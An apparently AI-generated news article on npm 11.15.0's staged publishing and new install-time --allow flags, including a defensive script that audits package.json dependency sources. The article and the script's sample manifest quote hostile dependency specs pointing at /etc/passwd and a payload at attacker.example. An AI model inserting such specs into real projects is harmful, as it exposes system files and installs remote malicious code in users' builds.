GitHub: npm 11.15.0 introduces staged publishing and three new install-time --allow flags for supply chain hardening
GitHub released npm CLI version 11.15.0, which introduces staged publishing — packages now require maintainer approval before becoming available for installation. A set of three new install-time flags (--allow-file, --allow-remote, --allow-directory) alongside the existing --allow-git was also introduced for granular control over dependency sources in the npm install command.
This article was generated using artificial intelligence from primary sources.
GitHub announced two related npm registry security improvements on May 22, 2026, at 18:27 UTC: staged publishing as a new mechanism for the publish workflow, and three new install-time flags (--allow-file, --allow-remote, --allow-directory) for granular control over dependency sources in npm install. Both are available from npm CLI version 11.15.0, which was published simultaneously.
What is staged publishing and how does it change the workflow?
The old npm publish workflow was atomic: the moment a maintainer ran the command with their publish token, the package was immediately available globally for installation through all npm registry mirrors. This model produced approximately two incidents per year — compromised publish tokens published malicious packages that spread to thousands of CI pipelines before anyone detected them.
Staged publishing adds an intermediate step. After npm publish the package enters a staging state visible only to the authenticated maintainer. The maintainer can install it for their own testing (npm install package@staged), review metadata through npm view package --tag staged, and then explicitly run npm promote [email protected] to make the package publicly available. Without a promote step, the package expires from staging after 7 days and is automatically deleted.
The workflow is optional in the current version, but the package owner can set "publishConfig.staged": true in package.json to make all future publishes staged by default. Large packages (React, Vue, Next.js) have already announced they will switch to staged publishing by default during July 2026.
What do the three new --allow flags do?
npm install previously accepted dependencies from several sources without explicit configuration by default: local file: paths, http(s) tarball URLs, and workspace directory references. This meant that the package.json of a compromised public package could contain a dependency like "internal-helpers": "file:/etc/passwd" or "auth": "https://attacker.example/payload.tgz" — and npm install would install them without warning.
Three new flags now explicitly control those sources:
- --allow-file permits file: dependencies (e.g., for local monorepo workspaces that do not use npm workspaces).
- --allow-remote permits http(s) tarball URLs (e.g., for internal package registries not hosted in the npm scope).
- --allow-directory permits workspace folder references.
In CI environments (when CI=true is set in the environment), all three flags are off by default, meaning npm install fails with a clear error message if package.json contains such a dependency. The required flag must be explicitly enabled in the CI script to proceed. In local dev environments (CI not set), the flags are on by default for backward compatibility, but a maintainer's team can set allow-file to false in .npmrc (npm config set allow-file false) to enforce strict mode locally as well.
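A pre-install check along these lines shows which dependency sources a manifest would need enabled before it reaches CI. This is an added example, not code from npm or GitHub; the function names and the mapping from spec shape to flag (file: prefix, http(s) URL, bare path, git URL) are assumptions based on the flag descriptions above.

```javascript
// Added example; the spec-to-flag mapping is an assumption from the article's wording.
const DEP_FIELDS = ["dependencies", "devDependencies", "optionalDependencies", "peerDependencies"];

function requiredFlag(spec) {
  const s = String(spec).trim();
  if (/^file:/i.test(s)) return "--allow-file";
  if (/^https?:\/\//i.test(s)) return "--allow-remote";
  // Bare relative, absolute or home-relative paths are treated as folder references.
  if (/^(\.{1,2}[\\/]|[\\/]|~[\\/])/.test(s)) return "--allow-directory";
  // git URLs, hosted-git prefixes and the user/repo shorthand.
  if (/^(git(\+(https?|ssh|file))?:|github:|gitlab:|bitbucket:)/i.test(s)) return "--allow-git";
  if (/^[\w.-]+\/[\w.-]+(#.*)?$/.test(s)) return "--allow-git";
  return null; // semver range, dist-tag or npm: alias, resolved through the registry
}

// Returns one finding per dependency whose source would need an --allow flag.
function auditManifest(manifest) {
  const findings = [];
  for (const field of DEP_FIELDS) {
    for (const [name, spec] of Object.entries(manifest[field] || {})) {
      const flag = requiredFlag(spec);
      if (flag) findings.push({ field, name, spec, flag });
    }
  }
  return findings;
}

// Distinct flags a CI job would have to enable for this manifest to install.
function flagsNeeded(manifest) {
  return [...new Set(auditManifest(manifest).map((f) => f.flag))].sort();
}

// Constructed sample; the first two specs are the ones quoted in the article.
const sample = {
  name: "constructed-example",
  dependencies: {
    "internal-helpers": "file:/etc/passwd",
    "auth": "https://attacker.example/payload.tgz",
    "left-pad": "^1.3.0",
  },
  devDependencies: { "shared-config": "../shared-config", "tooling": "git+https://git.example/org/tooling.git" },
};

for (const f of auditManifest(sample)) {
  console.log(`${f.field}.${f.name} = ${f.spec} -> needs ${f.flag}`);
}
```

Running auditManifest over the manifests of already-installed packages extends the same check to transitive dependencies, which is where the injected specs described above would appear.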
How does this fit into broader npm supply chain security?
These mechanisms build on existing npm security features: npm audit (dependency vulnerability scanning), provenance attestations (cryptographic link between a package and its GitHub Actions build), and mandatory 2FA for maintainers of packages with more than 1,000 weekly downloads. Staged publishing is a second layer protecting against compromised tokens; --allow flags are a third layer protecting against malicious dependency injection.
GitHub announced in the same post that during summer 2026 it will publish a npm-policy.json schema that will allow enterprise tenants to centrally define which dependency sources are acceptable for their repositories, and that CI systems (GitHub Actions, GitLab CI, CircleCI) will integrate enforcement at the pipeline level. A pre-release draft of the schema is available in the npm/cli GitHub repository.
What is the compatibility with previous versions?
npm 11.15.0 is compatible with Node.js 22 LTS and newer. The staged publishing endpoint on the npm registry is available to all clients, but older npm CLI versions do not understand the command — maintainers who want the staged workflow must upgrade. The --allow flags are new CLI arguments — older versions will ignore them or report an unknown option warning, which does not break backward compatibility.
Frequently Asked Questions
- What is staged publishing in npm 11.15.0?
- Staged publishing means that after publication a package enters a staging state visible only to the authenticated maintainer for testing. Only after an explicit promote step does the package become publicly available for installation. This prevents a compromised publish token from accidentally publishing a malicious update.
- What are the three new --allow flags?
- --allow-file (permits local file: dependencies), --allow-remote (permits http(s) tarball URLs), and --allow-directory (permits workspace folder references). All three are disabled by default in CI environments — you must explicitly enable them for workflows that truly need them.
- What does this change for npm supply chain security?
- It reduces the attack surface in two ways: compromised publish tokens can no longer immediately publish a malicious package (it waits for promote), and CI pipelines cannot accidentally install a package from an untrusted source (file/remote/dir are off by default). Compatible with npm 11.x and Node.js 22 LTS+.